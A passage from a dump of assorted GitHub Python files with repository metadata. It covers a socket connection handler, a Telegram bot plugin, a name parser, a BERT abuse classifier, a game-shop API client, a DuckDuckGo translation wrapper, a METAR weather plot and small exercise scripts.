self._send_queue.put(message.get_serialized())\n\n # enqueue a request, returns a future to wait for a response. If yield_message is true, the message handler will\n # pass the message through this event rather than handle it itself\n def send_message_and_wait_response(self, message: Message, is_response=False, yield_message=False) -> MessageEvent:\n message.conn_handler = self\n message.is_received = False\n # Don't change the CSeq if we are responding to a message\n if not is_response:\n self.CSeq += 1\n logging.debug(f\"CSeq for {self.addr} is now {self.CSeq}\")\n message.CSeq = self.CSeq\n #self._set_selector_events_mask('rw')\n # Add the wait event before sending\n logging.debug(f\"Enqueued{' response' if is_response else ''}: {message.content.request['action']} to {self.addr} with wait on CSeq {message.CSeq}\")\n message_event = self._add_new_await(message.CSeq, yield_message)\n # Force a reserialize, fixes an edge case where we wait on a message with wrong CSeq sent\n self._send_queue.put(message.get_serialized(force_reserialize=True))\n return message_event\n\n # Add a new CSeq await to the list of waiting event objects\n def _add_new_await(self, CSeq, yield_message) -> MessageEvent:\n if CSeq in self.await_list:\n logging.error(f\"Already waiting for a response to this message...\")\n event = MessageEvent(yield_message)\n #logging.debug(f\"Adding await for CSeq {CSeq}\")\n self.await_list[CSeq] = event\n return event\n\n # Set selector to listen for events: mode is 'r', 'w', or 'rw'.\n def _set_selector_events_mask(self, mode):\n logging.debug(f\"Set selector to mode {mode}\")\n if mode == \"r\":\n events = selectors.EVENT_READ\n elif mode == \"w\":\n events = selectors.EVENT_WRITE\n elif mode == \"rw\":\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n else:\n raise ValueError(f\"Invalid events mask mode {mode!r}.\")\n self.selector.modify(self.sock, events, data=self)\n\n def close(self):\n logging.info(f\"Closing connection to {self.addr}\")\n if self.peer is not None:\n self.peer.is_active = False\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n logging.error(\n f\"Error: selector.unregister() exception for \"\n f\"{self.addr}: {e!r}\"\n )\n\n try:\n self.sock.close()\n except OSError as e:\n logging.error(f\"Error: socket.close() exception for {self.addr}: {e!r}\")\n finally:\n # Delete reference to socket object for garbage collection\n self.sock = None\n","repo_name":"JerritEic/ResourceMapping","sub_path":"src/NetProtocol/ConnectionHandler.py","file_name":"ConnectionHandler.py","file_ext":"py","file_size_in_byte":11644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28339655694","text":"from pyrogram import Client, filters, raw\nfrom plugins import r, admin\n\nimport time\n\n\n@Client.on_message(filters.private & filters.user(admin) & filters.command(\"status\"))\ndef get_info(c, m):\n c.send(\n raw.functions.messages.StartBot(\n bot=c.resolve_peer('SpamBot'),\n peer=c.resolve_peer('SpamBot'),\n random_id=c.rnd_id(),\n start_param='start'\n )\n )\n\n\n@Client.on_message(filters.user('SpamBot'))\ndef status(c, m):\n c.send_chat_action(chat_id=admin, action='typing')\n time.sleep(0.15)\n\n c.send_message(chat_id=admin, text=m.text)\n\n\n@Client.on_message(filters.private & filters.user(admin) & filters.command(\"info\"))\ndef show_info(c, m):\n chat_id = m.chat.id\n counter = 0\n\n for dialog in c.iter_dialogs():\n if dialog.chat.type in [\"supergroup\", \"group\"]:\n counter += 1\n\n message = f\"\"\"\n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n〽️اطلاعات ربات〽️\n\n🔘• تعداد گروه ها : {counter}\n🔘• تعداد کاربران : pass\n🔘• مدیران : admin \n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n \"\"\"\n\n c.send_chat_action(chat_id, 'typing')\n time.sleep(0.15)\n\n c.send_message(chat_id=chat_id, text=message)\n","repo_name":"MGunner/BotCli","sub_path":"plugins/info_section.py","file_name":"info_section.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38648983852","text":"import re\n\ndef __strip_prefix(name):\n name = re.sub(r'\\A(mr|ms|mrs|dr|md|prof|miss|master) ','',name).strip()\n name = re.sub(r'\\A,','',name).strip()\n return name\n\ndef __strip_suffix(name):\n name = re.sub(r' (jr|sr|esq|dr|md|dds|mba|phd)\\Z','',name).strip()\n name = re.sub(r',\\Z','',name).strip()\n return name\n\ndef clean(name):\n \"\"\"Returns a tuple, (firstname,middlename,lastname,confidence) with best \n guesses for each name value and an indication of how confident the cleaning\n process was.\n \"\"\"\n name = str(name) # since pandas might pass in numbers as ints\n name = name.lower()\n name = re.sub(r'\\.', '', name).strip() # remove .'s\n name = re.sub(r'[\\s]+', ' ', name).strip() # remove multiple \\s\n\n while name != __strip_prefix(name):\n # remove prefixes\n name = __strip_prefix(name)\n while name != __strip_suffix(name):\n # remove suffixes\n name = __strip_suffix(name)\n\n # split name on surname prefix\n surname_prefix_found = False\n surname_prefixes = ['van','von','de','da','dos','del','la','el','al','der','bin','di','ben','abu','du','dal','della','mac','haj','ter','neder','ibn','ab','nic','ek','lund','beck','oz','berg','papa','hadj','bar','skog','bjorn','degli','holm']\n for surname_prefix in surname_prefixes:\n if re.match(r'\\A.*\\s('+surname_prefix+')\\s.*\\Z', name):\n name_re = re.search(r'\\A(.*)\\s(('+surname_prefix+')\\s.*)\\Z', name)\n values = (name_re.group(1),'',name_re.group(2), 0.5)\n surname_prefix_found = True\n break\n\n if surname_prefix_found == False:\n if re.match(r'\\A[^\\s]+\\Z', name):\n # first (no \\s)\n values = (name, None, None, 0.5)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s]+\\Z', name):\n # first + last (split on \\s)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), None, name_re.group(2), 1)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s][\\s][^\\s]+\\Z', name):\n # first + mi + last (split on mi)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s])[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), name_re.group(2), name_re.group(3), 1)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s]+[\\s][^\\s]+\\Z', name):\n # first + middle + last (split on middle)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s]+)[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), name_re.group(2), name_re.group(3), 1)\n else:\n # other\n values = (name, None, None, 0)\n return values\n","repo_name":"cwkchan/MOOC","sub_path":"names/clean_names.py","file_name":"clean_names.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41114239689","text":"import torch\nimport torch.nn as nn\nfrom pytorch_pretrained_bert import BertModel\n\n\nclass AbuseDetectNet(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.label_dim = config.label_dim\n self.bert_base = BertModel.from_pretrained(config.bert_model_name)\n self.num_hidden_features = config.num_hidden_features\n self.bert_hidden_size = self.bert_base.config.hidden_size\n self.bert_max_seq_length = self.bert_base.config.max_position_embeddings\n\n # compute number of features to classification layer\n features_dim = self.bert_hidden_size * self.num_hidden_features # concat last hidden layers\n self.cls_layer = nn.Linear(in_features=features_dim, out_features=self.label_dim)\n self.train_params = self.cls_layer.parameters()\n\n def forward(self, x, attention_mask):\n # switch bert model to eval mode (no fine tuning just features extraction)\n self.bert_base.eval()\n\n encoded_layers, _ = self.bert_base(x, attention_mask=attention_mask)\n feature_layers = encoded_layers[-self.num_hidden_features:]\n feature_tensor = torch.cat(feature_layers, dim=2) # concatenate on feature index\n first_token_tensor = feature_tensor[:, 0, :] # getting tensor with shape [batch, features]\n logits = self.cls_layer(first_token_tensor)\n\n return logits\n","repo_name":"ofrikleinfeld/AbusiveAdversarial","sub_path":"models_and_training/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16571387161","text":"import logging\n\nfrom . import Config, WebRequest\n\n\nclass Good:\n def __init__(self, root, shop_type):\n self.id = int(root['id'])\n self.p_id = int(root['p_id'])\n self.type = root['type']\n self.num = int(root['num'])\n self.price = int(root['price'])\n self.shop_type = shop_type\n\n @property\n def is_plant(self):\n return self.type == 'organisms'\n\n\nclass PurchaseItem:\n def __init__(self, good: Good, amount: int):\n self.good = good\n self.amount = amount\n\n\nclass Shop:\n def __init__(self, cfg: Config):\n self.cfg = cfg\n self.wr = WebRequest(cfg)\n self.type_list = [1, 2, 5, 3, 6]\n self.shop_name_list = [\"普通商店\", \"礼券商店\", \"荣誉商店\", \"金券商城\", \"VIP商城\"]\n\n def _refresh_shop(self, shop_type: int):\n body = [float(shop_type)]\n resp = self.wr.amf_post_retry(\n body, \"api.shop.getMerchandises\", \"/pvz/amf/\", \"获取商店信息\", except_retry=True\n )\n return resp\n\n def refresh_shop(self):\n import concurrent.futures\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n futures = []\n for t in self.type_list:\n futures.append(executor.submit(self._refresh_shop, t))\n concurrent.futures.wait(futures, return_when=concurrent.futures.ALL_COMPLETED)\n\n self.good_id2good: dict[int, Good] = {}\n self.shop_goods_list = []\n for shop_type, future in zip(self.type_list, futures):\n try:\n response = future.result()\n except Exception as e:\n logging.error(e)\n continue\n if response.status == 0:\n pass\n else:\n logging.error(\"获取商店信息失败\")\n raise NotImplementedError\n goods = response.body\n self.shop_goods_list.append([Good(good, shop_type) for good in goods])\n self.good_id2good.update(\n {int(good.id): Good(good, shop_type) for good in goods}\n )\n\n def buy(self, item_id: int, amount: int):\n body = [float(item_id), float(amount)]\n response = self.wr.amf_post_retry(body, \"api.shop.buy\", \"/pvz/amf/\", \"购买物品\")\n if response.status == 0:\n if response.body['status'] == 'success':\n return {\"success\": True, \"result\": response.body}\n return {\"success\": False, \"result\": response.body['status']}\n else:\n return {\"success\": False, \"result\": response.body.description}\n","repo_name":"bwnotfound/pypvzol","sub_path":"pypvz/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"16047735614","text":"from code_challenges.arrays.two_sum.two_sum import twoSum # type: ignore\nimport pytest\n\ndef test_two_sum():\n nums = [2,7,11,15]\n target = 9\n actual = twoSum(nums, target)\n expected = [1,0]\n assert actual == expected\n\n\ndef test_two_sum_two():\n nums = [3,2,4]\n target = 6\n actual = twoSum(nums, target)\n expected = [2,1]\n assert actual == expected\n\n\ndef test_two_sum_three():\n nums = [3,3]\n target = 6\n actual = twoSum(nums, target)\n expected = [1,0]\n assert actual == expected","repo_name":"sarastrasner/daily-code-challenges","sub_path":"python/tests/test_two_sum.py","file_name":"test_two_sum.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73409321606","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nfrom skimage import io, transform, morphology\n#from tensorflow.keras import Model, layers\nfrom model import dice, dice_loss, unet_2d_b, denseud_byb_v2\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.utils import CustomObjectScope\n\n#TestDir = '../sample/TestData'\n#LabelDir = '../sample/TestLabel'\nTestDir = '../crop/testdata'\nLabelDir = '../crop/testlabel'\n\nsamples = os.listdir(TestDir)\npre_list = ['ac2', 'p4', 'p3', 'p2']\n\nwith CustomObjectScope({'dice': dice, 'dice_loss':dice_loss}):\n #mymodel = load_model('models/denseud_sum_v3.hdf5')\n mymodel = unet_2d_b(pretrained_weights='models/unet_spac_crop.h5')\n \n #n5 = mymodel.get_layer('')\n \n for p in pre_list:\n if not os.path.exists(p):\n os.mkdir(p)\n if not os.path.exists('gt'):\n os.mkdir('gt')\n if not os.path.exists('edge'):\n os.mkdir('edge')\n \n for sample in samples:\n print(sample)\n arr = np.load(os.path.join(TestDir, sample))\n lab = np.load(os.path.join(LabelDir, sample))\n outname = sample.split('.')[0]+'.png'\n arr = arr/1000\n arr[arr>1]=1\n arr[arr<-1]=-1\n \n arr = transform.resize(arr, [256,256], order=0)\n lab = transform.resize(lab, [256,256], order=0)\n #io.imsave(os.path.join('img', outname),(arr+1)/2)\n '''\n lab_d = morphology.dilation(lab, selem=morphology.square(7))\n lab_e = morphology.erosion(lab, selem=morphology.square(7))\n edge = lab_d - lab_e\n \n io.imsave(os.path.join('edge', outname),edge)\n '''\n arr = arr[np.newaxis,:,:,np.newaxis]\n io.imsave(os.path.join('crop_gt', outname),lab)\n res = mymodel.predict_on_batch(arr)\n #for i in range(3):\n # io.imsave(os.path.join(pre_list[i], outname), res[i][0, :, :, 0])\n io.imsave(os.path.join('crop', outname), res[0][0, :, :, 0])\n #results = mymodel.predict_generator(tval_gen,438,verbose=1)\n #saveResult(\"cropdata/ValPredict\", 'cropdata/ValData',results)\n #print(mymodel.layers[1].get_weights())","repo_name":"acc-L/Morphological-constrained-Unet-for-NB-segmentation","sub_path":"saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21448394885","text":"\"\"\"maximise sum at hackerrank.com\r\n\"\"\"\r\n\"\"\"\r\nProblem statement\r\n\r\nGet maximum of sum of subarray modulo M where M is given.\r\nSubarray is a continuous subset of array elements.\r\n\r\nSample Input\r\n\r\n1\r\n5 7\r\n3 3 9 9 5\r\n\r\nSample Output\r\n\r\n6\r\n\r\nExplanation\r\n\r\nMax Possible Sum taking Modulo 7 is 6 , and we can get 6 by\r\nadding first and second element of the array\r\n\"\"\"\r\n\r\ncases = int(raw_input())\r\n\r\nfor _ in range(cases) :\r\n\r\n size, modulo = map(int, raw_input().split())\r\n integers = map(int, raw_input().split())\r\n maxVal = 0\r\n for index in range(size) :\r\n found = False\r\n series_sum = 0\r\n for subindex in range(index, size) :\r\n series_sum += sum(integers[index:subindex + 1])%modulo\r\n \r\n \r\n\r\n\r\n## for index in range(size) :\r\n## rightSeriesSum = 0\r\n## leftSeriesSum = 0\r\n## found = 0\r\n## for subindex in range(index, size) :\r\n## rightSeriesSum += integers[subindex]\r\n## if rightSeriesSum % M > maxVal :\r\n## maxVal = rightSeriesSum\r\n## if maxVal == M - 1 :\r\n## found = 1\r\n## break\r\n## if found == 1 :\r\n## break\r\n\r\n## for subindex in range(index+1) :\r\n## leftSeriesSum += integers[subindex]\r\n## if leftSeriesSum % M > maxVal :\r\n## maxVal = rightSeriesSum\r\n## if maxVAl == M - 1 :\r\n## found = 1\r\n## break\r\n## if found == 1 :\r\n## break\r\n\r\n## print maxVal\r\n\r\n \r\n \r\n","repo_name":"108krohan/codor","sub_path":"hackerrank-python/algorithm/searching/maximiseSum.py","file_name":"maximiseSum.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35521229343","text":"#!/usr/bin/env python\n\n# Written by Ilias Giechaskiel\n# https://ilias.giechaskiel.com\n# June 2015\n\nfrom gnuradio import gr\nfrom gnuradio import blocks\n\nimport usrp_src\nimport transition_sink\nimport background\nimport record\n\nclass decoder(gr.hier_block2):\n def __init__(self, src=\"uhd\", dst=None, repeat=False, reader=True, tag=True, samp_rate=2e6, emulator=None):\n gr.hier_block2.__init__(self, \"decoder\",\n gr.io_signature(0, 0, 0), # Input signature\n gr.io_signature(0, 0, 0)) # Output signature\n\n if src == \"uhd\":\n self._src = usrp_src.usrp_src(samp_rate=samp_rate, dst=dst)\n hi_val = 1.1\n else:\n self._wav = blocks.wavfile_source(src, repeat)\n self._r2c = blocks.float_to_complex(1)\n self._src = blocks.complex_to_mag_squared(1)\n self.connect(self._wav, self._r2c, self._src)\n hi_val = 1.09 # may need to be set to 1.05 depending on antenna setup\n\n self._back = background.background(reader, tag, emulator)\n self._trans = transition_sink.transition_sink(samp_rate, self._back.append, hi_val=hi_val)\n self.connect(self._src, self._trans)\n","repo_name":"giech/usrp_nfc","sub_path":"code/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"99"} +{"seq_id":"14228937895","text":"class Solution:\n def subsets(self, nums):\n sets = set({})\n\n def itr(elements, opts):\n sets.add(tuple(elements))\n\n for idx, opt in enumerate(opts):\n itr(elements+[opt], opts[idx+1:])\n\n itr([], nums)\n\n resp = []\n\n for e in sets:\n resp.append(list(e))\n\n return resp\n\nprint(Solution().subsets([1,2,3]))\n","repo_name":"Th3Lourde/l33tcode","sub_path":"problemSets/top75/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22975069386","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nA Translation module.\n\nYou can translate text using this module.\n\"\"\"\nimport re\nimport time\nfrom random import choice, expovariate\nfrom urllib.parse import urlencode, urlparse, urlunparse\nfrom functools import wraps\nfrom typing import Callable\n\nimport requests\n\nfrom .models import Translated\nfrom .constants import (USERAGENTS, DEFAULT_RAISE_EXCEPTION, BASE_URL,\n DUMMY_DATA, LANGCODES, LANGUAGES, HEADERS, PHRASES)\nfrom .exceptions import ConnectionException, BadResponseException\n\n\ndef _retry_on_connection_error(func: Callable) -> Callable:\n \"\"\"Decorator to retry the function max_connection_attemps number of times.\n\n Herewith-decorated functions need an ``_attempt`` keyword argument.\n\n This is to decorate functions that do network requests that may fail.\n Functions that only use these for network access must not be decorated with this decorator.\"\"\"\n @wraps(func)\n def call(translator, *args, **kwargs):\n try:\n return func(translator, *args, **kwargs)\n except BadResponseException as err:\n error_string = f\"{func.__name__}({', '.join([repr(arg) for arg in args])}): {err}\"\n if (kwargs.get('_attempt') or 1) == translator.max_connection_attempts:\n raise ConnectionException(error_string) from None\n try:\n if kwargs.get('_attempt'):\n kwargs['_attempt'] += 1\n else:\n kwargs['_attempt'] = 2\n translator._do_sleep()\n return call(translator, *args, **kwargs)\n except ConnectionException:\n raise ConnectionException(error_string) from None\n return call\n\n\nclass Translator:\n \"\"\"Duckduckgo Translator API\n\n :param user_agent: the User-Agent header to send when making requests.\n :type user_agent: :class:`str`\n\n :param timeout: Definition of timeout for httpx library.\n Will be used for every request.\n :type timeout: :class:`int`\n\n :param raise_exception: if `True` then raise exception if something goes wrong\n :type raise_exception: :class:`bool`\n\n :param headers: Headers for requests.\n :type headers: :class:`dict`\n\n :param query_string: Query string for vqd.\n :type query_string: :class:`str`\n\n :param sleep: if `True` then during `max_connection_attempts` wait before request.\n :type sleep: :class:`bool`\n\n :param max_connection_attempts: Maximum number of connection attempts until a\n request is aborted. Defaults to 3.\n Set this to 0 to retry infinitely.\n :type max_connection_attempts: :class:`int`\n \"\"\"\n\n def __init__(\n self, useragent=None, raise_exception=DEFAULT_RAISE_EXCEPTION,\n timeout=5, headers=None, query_string=None, max_connection_attempts=3, sleep=False):\n\n self.timeout = timeout\n self.raise_exception = raise_exception\n self.sleep = sleep\n self.max_connection_attempts = max_connection_attempts\n\n self.headers = headers\n if not self.headers:\n self.headers = HEADERS\n\n self.useragent = useragent\n if self.useragent:\n self.headers['User-Agent'] = self.useragent\n\n self.query_string = query_string\n if not self.query_string:\n self.query_string = choice(PHRASES)\n\n self.vqd = self._get_vqd(self.query_string)\n\n @_retry_on_connection_error\n def _get_vqd(self, query_string: str) -> str:\n \"\"\"Return vqd string. Required for Duckduckgo api.\"\"\"\n\n # For getting random vqd...\n query_params = {'q': query_string}\n\n # Build req url\n vqd_req_url = urlunparse(\n urlparse(BASE_URL)._replace(query=urlencode(query_params)))\n \n vqd_res = requests.get(vqd_req_url, headers=self.headers, timeout=self.timeout)\n\n vqd: str = ''\n\n vqd_list = re.findall('vqd=\"([^\"]*)\"', vqd_res.text)\n if vqd_list:\n vqd = vqd_list[0]\n\n return vqd\n\n def _change_vqd(self):\n new_phrase = choice(PHRASES)\n\n while self.query_string == new_phrase:\n new_phrase = choice(PHRASES)\n\n self.query_string = new_phrase\n self.vqd = self._get_vqd(self.query_string)\n\n def _change_useragent(self):\n new_useragent = choice(USERAGENTS)\n\n while self.headers['User-Agent'] == new_useragent:\n new_useragent = choice(USERAGENTS)\n\n self.headers['User-Agent'] = new_useragent\n\n @_retry_on_connection_error\n def _translate(self, text: str, dest: str, src: str = '', _attempt: int = 1):\n \"\"\"Low-level communication with duckduckgo.com\"\"\"\n\n # Max lenth is 1000 for data\n text = text.strip()[:1000]\n data = text[:text.rfind('.') + 1] if len(text) == 1000 else text\n\n # Set query params\n query_params = {\n 'vqd': self.vqd,\n 'query': self.query_string,\n 'to': dest,\n }\n\n # if `from` is not in `query_params` then duckduckgo detects `from`\n if src:\n query_params.update({'from': src})\n\n # build `req_url` from `BASE_URL`\n req_url = urlunparse(\n urlparse(BASE_URL)._replace(query=urlencode(query_params), path='translation.js'))\n\n res = requests.post(req_url, data=data, timeout=self.timeout, headers=self.headers)\n\n if res.ok:\n return res.json(), res\n\n if self.raise_exception:\n exception_message = f'Unexpected status code \"{res.status_code}\" from {res.url}' \\\n f'\\nResponse text is {res.text}'\n raise BadResponseException(exception_message)\n\n return DUMMY_DATA, res\n\n def _do_sleep(self):\n if self.sleep:\n time.sleep(min(expovariate(0.6), 10.0))\n\n def translate(\n self, text: str, src: str='', dest: str='en',\n new_useragent: bool=False, new_vqd: bool=False):\n \"\"\"Return translated text.\n\n :param text: Text to translate, if text length more than\n 1000 then splits first 1000.\n\n :param src: Source language.\n\n :param dest: Destionation language.\n\n :param new_useragent: if `True` then use new useragent for request.\n\n :param new_vqd: if `True` then use new new_vqd for request.\"\"\"\n\n src = src.lower()\n dest = dest.lower()\n\n if src and src not in LANGUAGES:\n if src in LANGCODES:\n src = LANGCODES[src]\n else:\n raise ValueError('invalid source language')\n\n if dest not in LANGUAGES:\n if dest in LANGCODES:\n dest = LANGCODES[dest]\n else:\n raise ValueError('invalid destination language')\n\n\n ## I do not know what is vqd, but it seems like an identifier,\n # cause its required for translation, let user can reset it.\n if new_vqd:\n self._change_vqd()\n if new_useragent:\n self._change_useragent()\n\n data, response = self._translate(text, dest, src)\n\n translated = data['translated']\n detected = data['detected_language']\n\n result = Translated(\n src=src, dest=dest, text=translated, origin=text,\n detected=detected, response=response)\n\n return result\n","repo_name":"metebtg/duckduckgo_translate","sub_path":"src/duckduckgo_translate/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74019562246","text":"#-----------------------------------------------------------------------------------------------------------\r\n# INPE / CPTEC - Training: Python and GOES-R Imagery: Script 25 - METAR Plot\r\n# Author: Diego Souza\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Adapted from: https://unidata.github.io/MetPy/latest/examples/plots/Station_Plot.html\r\n\r\nimport matplotlib.pyplot as plt # Plotting library\r\nimport cartopy, cartopy.crs as ccrs # Plot maps\r\nimport cartopy.io.shapereader as shpreader # Import shapefiles\r\nimport cartopy.feature as cfeature # Common drawing and filtering operations\r\nimport os # Miscellaneous operating system interfaces\r\nimport numpy as np # Scientific computing with Python\r\nimport requests # HTTP library for Python\r\nfrom datetime import timedelta, date, datetime # Basic Dates and time types\r\nfrom metpy.calc import reduce_point_density # Provide tools for unit-aware, meteorological calculations \r\nfrom metpy.io import metar # Parse METAR-formatted data\r\nfrom metpy.plots import current_weather, sky_cover, StationPlot # Contains functionality for making meteorological plots\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Select the extent [min. lon, min. lat, max. lon, max. lat]\r\nextent = [-93.0, -60.00, -25.00, 18.00]\r\n\r\n# Input and output directories\r\ndir = \"Samples\"; os.makedirs(dir, exist_ok=True)\r\noutput = \"Output\"; os.makedirs(output, exist_ok=True)\r\n\r\n# Download the METAR File\r\n#date = datetime.today().strftime('%Y%m%d')\r\ndate = '20210702' # CHANGE THIS DATE TO THE SAME DATE OF YOUR NWP DATA\r\nurl = 'https://thredds-test.unidata.ucar.edu/thredds/fileServer/noaaport/text/metar' \r\nfile_name = 'metar_' + date + '_0000.txt'\r\n\r\n# Sends a GET request to the specified url\r\nmyfile = requests.get(url + '//' + file_name)\r\n\r\n# Download the file\r\nopen(dir + '//' + file_name, 'wb').write(myfile.content)\r\n\r\n# METAR File\r\n# https://unidata.github.io/MetPy/latest/examples/plots/Station_Plot.html\r\ndata = metar.parse_metar_file(dir + '//' + file_name)\r\n\r\n# Drop rows with missing winds\r\ndata = data.dropna(how='any', subset=['wind_direction', 'wind_speed'])\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Choose the plot size (width x height, in inches)\r\nplt.figure(figsize=(8,8))\r\n\r\n# Set up the map projection\r\nproj = ccrs.PlateCarree()\r\n\r\n# Use the Geostationary projection in cartopy\r\nax = plt.axes(projection=proj)\r\n\r\n# Define the image extent\r\nimg_extent = [extent[0], extent[2], extent[1], extent[3]]\r\nax.set_extent([extent[0], extent[2], extent[1], extent[3]], ccrs.PlateCarree())\r\n\r\n\r\n# Change the DPI of the resulting figure. Higher DPI drastically improves the\r\n# look of the text rendering.\r\nplt.rcParams['savefig.dpi'] = 255\r\n\r\n# Use the Cartopy map projection to transform station locations to the map and\r\n# then refine the number of stations plotted by setting a minimum radius\r\npoint_locs = proj.transform_points(ccrs.PlateCarree(), data['longitude'].values, data['latitude'].values)\r\ndata = data[reduce_point_density(point_locs, 3)]\r\n\r\n# Add some various map elements to the plot to make it recognizable.\r\nax.add_feature(cfeature.LAND)\r\nax.add_feature(cfeature.OCEAN)\r\n\r\n# Add a shapefile\r\n# https://geoftp.ibge.gov.br/organizacao_do_territorio/malhas_territoriais/malhas_municipais/municipio_2019/Brasil/BR/br_unidades_da_federacao.zip\r\nshapefile = list(shpreader.Reader('BR_UF_2019.shp').geometries())\r\nax.add_geometries(shapefile, ccrs.PlateCarree(), edgecolor='gray',facecolor='none', linewidth=0.3)\r\n\r\n# Add coastlines, borders and gridlines\r\nax.coastlines(resolution='10m', color='black', linewidth=0.8)\r\nax.add_feature(cartopy.feature.BORDERS, edgecolor='black', linewidth=0.5)\r\ngl = ax.gridlines(crs=ccrs.PlateCarree(), color='white', alpha=1.0, linestyle='--', linewidth=0.25, xlocs=np.arange(-180, 180, 5), ylocs=np.arange(-90, 90, 5), draw_labels=True)\r\ngl.top_labels = False\r\ngl.right_labels = False\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n# Station Plot\r\n\r\n# Start the station plot by specifying the axes to draw on, as well as the\r\n# lon/lat of the stations (with transform). We also the fontsize to 12 pt.\r\nstationplot = StationPlot(ax, data['longitude'].values, data['latitude'].values,\r\n clip_on=True, transform=ccrs.PlateCarree(), fontsize=8)\r\n\r\n# Plot the temperature and dew point to the upper and lower left, respectively, of\r\n# the center point. Each one uses a different color.\r\nstationplot.plot_parameter('NW', data['air_temperature'].values, color='red')\r\nstationplot.plot_parameter('SW', data['dew_point_temperature'].values,\r\n color='darkgreen')\r\n\r\n# A more complex example uses a custom formatter to control how the sea-level pressure\r\n# values are plotted. This uses the standard trailing 3-digits of the pressure value\r\n# in tenths of millibars.\r\nstationplot.plot_parameter('NE', data['air_pressure_at_sea_level'].values,\r\n formatter=lambda v: format(10 * v, '.0f')[-3:])\r\n\r\n# Plot the cloud cover symbols in the center location. This uses the codes made above and\r\n# uses the `sky_cover` mapper to convert these values to font codes for the\r\n# weather symbol font.\r\nstationplot.plot_symbol('C', data['cloud_coverage'].values, sky_cover)\r\n\r\n# Same this time, but plot current weather to the left of center, using the\r\n# `current_weather` mapper to convert symbols to the right glyphs.\r\nstationplot.plot_symbol('W', data['present_weather'].values, current_weather)\r\n\r\n# Add wind barbs\r\n#stationplot.plot_barb(data['eastward_wind'].values, data['northward_wind'].values)\r\n\r\n# Also plot the actual text of the station id. Instead of cardinal directions,\r\n# plot further out by specifying a location of 2 increments in x and 0 in y.\r\nstationplot.plot_text((2, 0), data['station_id'].values)\r\n\r\n# Add a title\r\nplt.title('METAR | ' + date + ' 00:00 UTC | UNIDATA THREDDS Data Server', fontsize=8, loc='center')\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Save the image\r\nplt.savefig(f'{output}/image_25.png', bbox_inches='tight', pad_inches=0, dpi=300)\r\n\r\nplt.show()","repo_name":"diegormsouza/NWP-Python-Jul-2021","sub_path":"script_25.py","file_name":"script_25.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"99"} +{"seq_id":"3633872547","text":"import numpy as np\nimport matplotlib.pyplot as mp\nimport scipy\nimport math\nimport sympy\nfrom decimal import Decimal\n\ndef DoQuestion3():\n fig = mp.figure()\n ax = mp.subplot(111)\n elpsilon = 0.05\n d_vc = 10\n x = []\n y = []\n loop = 0\n var = 1000\n for N in range(10000000):\n if scipy.mod(N,100) == 5:\n var = var * 3\n loop += 1\n value = 4 *((2*N) ** d_vc) * math.exp(-(elpsilon**2)*N/8)\n if (1 == loop):\n lastValue = value\n x.append(N)\n y.append(value)\n\n print (value - 0.05,lastValue - 0.05)\n if scipy.sign(value - 0.05) != scipy.sign(lastValue - 0.05):\n print (scipy.sign(value - 0.05),scipy.sign(lastValue - 0.05))\n break\n lastValue = value\n\n\n z1 = np.array(x)\n z2 = np.array(y)\n ax.plot(z1[:], z2[:], '*', label='$y = Value$')\n #top = 10**10\n #ax.set_ylim(0,top)\n\n mp.title('Visualization of Dataset')\n ax.legend(loc='upper left', fontsize='small')\n fig.show()\n\ndef DoQuestion4And5():\n delta = 0.05\n d_vc = 50\n N = 10000\n\n # Original VC bound:\n elpsilon1 = 